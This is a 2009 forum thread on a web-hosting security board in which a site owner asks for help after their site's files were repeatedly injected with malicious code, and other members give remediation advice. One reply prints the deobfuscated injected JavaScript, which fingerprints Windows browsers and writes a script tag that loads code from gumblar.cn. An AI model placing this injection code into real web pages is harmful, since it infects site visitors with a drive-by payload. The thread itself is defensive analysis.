|
|
||||||
|
||||||
| Index Link To US Private Messages Archive FAQ RSS | ||||||
| Internet Security Discussion Forum This forum is for the discussion of security related issues. If you find a new Phishing scheme, spyware, virus or malicious site - let us know about it. If any of the above found you... here's where you ask for help. |
Share Thread: & Tags
|
||||
|
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|||
|
Hello,
My forum is running on a hosting copany. My forum and the whole website were infected by virus last week on Friday. Most of the files were infected. Infected files: "index.html" "index.htm" "index.php" "xxx.html" "xxx.tbl" "xxx.js" ... All the files were modified by adding some code with the files. Here are the codes. For the HTML files: <removed - wige> For the PHP files: <removed - wige> I did clear up(remove the codes form the files) all the files on this Monday and the web works fine, but today the website got the virus again. So, can someone tell me how to remove the virus? I alread scan my PC and it has no virus on it. Today I did clarn up the web site and it seems working fine now. But I am worry about the virus will come back again. Thanks. Last edited by wige; 06-04-2009 at 10:40 AM. Reason: Removed the exploit code, it was triggering some users' antivirus software |
|
|||
|
I have seen things like this before. The virus has probably infected the entire server and not just your web site. That may be why it has returned. The hacker may have root access to the server.
The first thing to do is to report it to the hosting company. They need to check the security for your site and their server. 1. Make sure that permissions are set correctly for your web site scripts. 2. Change your access passwords (FTP,cPanel, root) and make sure they are very secure passwords. Do not use dictionary words for your passwords. 3. If you are using open source software or something you purchased, make sure the version is current and check their forums to see if others are having the same problem. 4. If it keeps coming back or the hosting company is not cooperative, find a new hosting company.
__________________
Facts are meaningless. They can be used to prove anything. - Homer Simpson MySQL Cheatsheet :: Arizona SEO training |
|
|||
|
Someone has access to your server. You'll be cleaning twice a week for the forseable.
If your host has yet to deal with it the answer (which is a pain, but you already know) is to change hosts. |
|
|||
|
This doesn't look like a virus to me, per se. It looks more like you've experienced some cross-site injection attacks; which in essence are hacks. You need to make sure all your directories have the proper permissions and you need to properly validate all the variables inputted into your site.
In your logfiles look for http:// in your queries. Here is a log example of a slightly similar type of attack. I've added a few spaces to prevent linking. Quote:
__________________
I use Country IP Blocks as added security for my networks and servers. |
|
||||
|
The javascript resolves to the following.
The real damage (whatever that may be) is done by a script being called at gumblar dot cn. I dont really want to run the script just to find out what it does. Code:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if( (u.indexOf("Win")>0) &&
(u.indexOf("NT 6")<0) &&
(document.cookie.indexOf("miek=1") < 0) &&
(typeof(zrvzts) != typeof("A"))) {
zrvzts="A";
eval("if(window."+a+") j = j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//gumblar.cn/rss/?id="+j+">
<\/script>");
}
Quote:
|
|
||||
|
We had this problem a few months ago and it was a pain to remove - what you will find is that in every index file this code will eventually be loaded and in every directory you will also probably find a php file with a number or weird name - you can usually remove them with ftp, BUT, the file that causes the most problem is the htaccess file which this hacker script injects into every directory - I had to use shell access to be able to see the htaccess files and manually delete every file as well.
In our case the hosting company initially told us that it was all our fault and nothing to do with them, then after I took the whole website down (including about 300,000 images), cleaned it all out and rebuilt the site using all the latest software upgrades, the hosting company sent out a letter saying how proactive they were and had caught this attack and cleaned it on 23,000 sites they host. To say the least we were not impressed. However, contact the hosting company straightaway and tell them, as they may be able to strip the bogus php files and htaccess files quickly for you, else you may have a laborious process removing them all yourself. Also put your site into maintenance mode if you can else you will begin infecting visitor computers - we also had this and had a warning coming up from Google to say we were not safe to visit, which seriously impacts on profits quite quickly until being reinstated. Good luck
__________________
Creating affordable website & eCommerce solutions for NZ businesses, clubs and orgs. http://www.medlicottdesign.orconhosting.net.nz |
|
|||
|
Quote:
__________________
Facts are meaningless. They can be used to prove anything. - Homer Simpson MySQL Cheatsheet :: Arizona SEO training |
|
||||
|
Most likely vector: outdated software. Make sure you apply any and all updates to all software running on your site.
If you have the ability to disable or aggressively restrict remote file includes and filesystem access within PHP, do so.
__________________
Dan LeFree | Product Manager (Linux VPS Hosting) | Owner/Operator (Web development, marketing) |
![]() |
|
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Need help with virus on hosted Invision Power Board Forum | noah0295 | Internet Security Discussion Forum | 0 | 10-27-2005 09:33 PM |
| Urgent - a Google search sabotaged with Trojan Horse Virus | aperey | Internet Security Discussion Forum | 10 | 12-28-2004 10:17 PM |
| Beckham a new hook for Trojan Horse Virus | globalhostinggroup | Internet Security Discussion Forum | 0 | 10-14-2004 11:45 AM |
| Message Forum Board | kevyeow | Services for Sale/Hire | 3 | 09-25-2004 05:19 PM |
| Can you help I’m under attack from virus infected junk mail. | J&P | The Castle Breakroom (General: Any Topic) | 44 | 11-18-2003 11:25 PM |
|
WebProWorld |
Advertise |
Contact Us |
About |
Forum Rules |
MVP's |
Archive |
Newsletter Archive |
Top |
WebProNews
WebProWorld is an iEntry, Inc. ® site - © 2009 All Rights Reserved Privacy Policy and Legal iEntry, Inc. 2549 Richmond Rd. Lexington KY, 40509 |